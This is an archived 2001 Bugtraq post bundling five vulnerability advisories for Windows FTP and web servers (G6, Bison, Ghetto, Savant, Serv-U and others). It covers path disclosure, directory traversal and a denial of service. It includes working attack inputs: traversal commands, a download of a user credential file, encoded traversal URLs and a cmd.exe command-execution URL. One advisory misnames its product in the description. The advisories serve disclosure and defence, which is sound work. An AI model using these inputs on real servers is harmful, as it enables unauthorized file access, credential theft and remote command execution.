[20600] in bugtraq
Hexyn / Securax Advisory #15,16,17,18,19
daemon@ATHENA.MIT.EDU (Tom Tom)
Mon May 14 05:43:45 2001
From: "Tom Tom" <tvb71@hotmail.com>
To: BUGTRAQ@securityfocus.com
Date: Sat, 05 May 2001 21:15:39 -0000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_754d_4cf_2f99"
Message-ID: <F94O8FNpyLAPDVXLuSb00003055@hotmail.com>
This is a multi-part message in MIME format.
------=_NextPart_000_754d_4cf_2f99
Content-Type: text/plain; format=flowed
World,
When reading the list, it turned out some people reported bugs (like DoS'es)
that had already been reported in these Hexyn Advisory's, but were not
posted on the list.
So here they are.
Exploit(s) can be found @ http://t-Omicr0n.hexyn.be/
t-Omicr0n.
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
------=_NextPart_000_754d_4cf_2f99
Content-Type: text/plain; name="Hexyn-sa-15.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Hexyn-sa-15.txt"
Hexyn / Securax Advisory #15 - G6 FTP Full Installation Path
Topic: G6 FTP Full Installation Path
Announced: 2001-02-17
Affects: G6 FTP Server up to version 2.0
DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.
I. Problem Description
**********************
G6 FTP Server is a popular FTP server for Windows 9x/NT. A bug allows
any user to change to the directory G6 was installed in. Due to good
programming, the only way to exploit this bug is by viewing the full
installation path. Downloading the user-file (Users.ini) is impossible.
II. Impact
**************
When sending the command "CWD ..:/.." (or "cd ..:/.." in the default
UNIX FTP client), G6 FTP will try to change to the installation
directory, but it will give a "Forbidden" error. But when sending the
command "DELE ..:/unexisting_file" (or typing "delete ..:/fuck_him"),
G6 will return an error message containing the full path.
Example:
--------
[t-Omicr0n@10c41b0x:~]$telnet
telnet> open 31.3.3.7 21
Trying 31.3.3.7...
Connected to 31.3.3.7.
Escape character is '^]'.
220 t-Omicr0n FTP Server by G6 FTP Server ready ...
user anonymous
331 Anonymous logins allowed. Please use full email as password.
pass me@me.com
230 User anonymous logged in.
=> dele ..:/unexisting_file<newline>
550 '/C:/Program Files/G6 FTP Server/unexisting_file': no such file or
directory.
What happens ?
*------------*
Due to the ":", G6 thinks you want to change to another drive. But
because you use two characters to specify a drive (dd:/ instead of d:/),
G6 panics and goes directly to the c:\ drive. But because you are
already on the C drive, in the program directory to be exact, it
changes to this directory. So now we know we are in the program
directory. Now, if we do something wrong in the way we get an error
with the path included, we get the full path of the program directory.
Note:
- "Show Relative Path" must be OFF (It is off by default, but some say
it is a violation of the server's privacy (and it looks unprofessional
if you ask me) so some admins turn it off.)
- BUT: Due to another bug in G6 FTP Server, when your users have to be
able to change disks, admins have keep this off, otherwise it is
impossible to change to another drive...
- As far as I tested, this only works with the DELE and the RNFR
command. The others (RETR, APPE,...) will give a 550: Permission Denied
error without the path. But DELE is all we need. :)
III. Solution
*************
There is a temporary solution. When the option "Show Relative Path" is
checked, G6 FTP will not give out the full path.
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be
------=_NextPart_000_754d_4cf_2f99
Content-Type: text/plain; name="Hexyn-sa-17.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Hexyn-sa-17.txt"
Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal
Topic: Bison FTP Server Directory Traversal
Announced: 2001-02-17
Affects: Bison FTP Server version 4 Release 1
DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.
THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS
BE CORRECT.
I. Problem Description
**********************
Bison FTP Server is an FTP server for Windows 9x/NT. A bug allows any
user to change to any directory.
II. Impact
**************
When sending the command "CWD ..." (or "cd ..." in the default UNIX FTP
client), the server will go one directory up.
Example:
--------
<snip>
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /.../.../
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /.
<directory listing of c:\>
ftp> quit
221 Bye.
III. Solution
*************
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be
------=_NextPart_000_754d_4cf_2f99
Content-Type: text/plain; name="Hexyn-sa-16.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Hexyn-sa-16.txt"
Hexyn / Securax Advisory #16 - Ghetto FTP Server Directory Traversal
Topic: Ghetto FTP Server Directory Traversal
Announced: 2001-02-17
Affects: Ghetto FTP Server version 1.0 beta 1
DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.
I. Problem Description
**********************
G6 FTP Server is an FTP server for Windows 9x/NT. A bug allows any user
to change to c:\ and sub directories.
II. Impact
**************
When sending the command "CWD /" (or "cd /" in the default UNIX FTP
client), Ghetto FTP will change to c:\.
Example:
--------
<snip>
230 User anonymous logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /.
<directory listing of c:\>
ftp> GET /Program Files/CorbaSoft/GFTPS/userbase.ini
local: userbase.ini remote: userbase.ini
200 PORT command successful.
150 Opening BINARY mode data connection.
226 Transfer complete.
3048 bytes received in 0.214 secs (14 Kbytes/sec)
ftp> quit
221 Bye.
III. Solution
*************
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be
------=_NextPart_000_754d_4cf_2f99
Content-Type: text/plain; name="Hexyn-sa-18.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Hexyn-sa-18.txt"
Hexyn / Securax Advisory #18 - Savant WWW Unicode Directory Traversal
Topic: Savant WWW Unicode Directory Traversal
Announced: 2001-02-17
Affects: Savant WWW Unicode version 2.1
DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.
I. Problem Description
**********************
Savant WWW Server is an HTTP server for Windows 9x/NT. A bug allows any
user to change to any directory, and in most cases, execute MS-DOS
commands.
II. Impact
**************
Savant filters "/.." out of the string, but forgets "%2f..".
Example:
--------
http://www.testserver.com/%2f..%2f..%2f../
HTTP Directory of //../../../
<directory listing of c:\>
Notes:
- When the user does not know a directory which allows listings, one
cannot get a listing, but one can still download know files.
- When the user know a directory which allows CGI-execution, one can
execute MS-DOS commands using:
http://www.test_server.com/cgi-bin/%2f..%2f..%2f../cmd.exe?+/c+dir
III. Solution
*************
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be
------=_NextPart_000_754d_4cf_2f99
Content-Type: text/plain; name="Hexyn-sa-19.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Hexyn-sa-19.txt"
Hexyn / Securax Advisory #19 - Multiple FTP Server DoS
Topic: Multiple FTP Server DoS
Announced: 2001-02-17
Affects: Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...
DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.
THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS
BE CORRECT.
I. Problem Description
**********************
There is a DoS attack in most of the FTP Servers available on for
Windows 9x/NT. The bug is a consequence of the way Windows handles disk
drives.
II. Impact
**************
When sending the command "retr a:/blah" (or "get a:/blah" in the
default UNIX FTP client), the server will freeze for about one second,
and the CPU usage will go through the roof.
Exploit:
--------
Available at: http://t-Omicr0n.hexyn.be/exploits.htm
III. Solution
*************
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by t-Omicr0n <omicr0n@themail.com>
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone
at #securax@irc.hexyn.be
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be
------=_NextPart_000_754d_4cf_2f99--
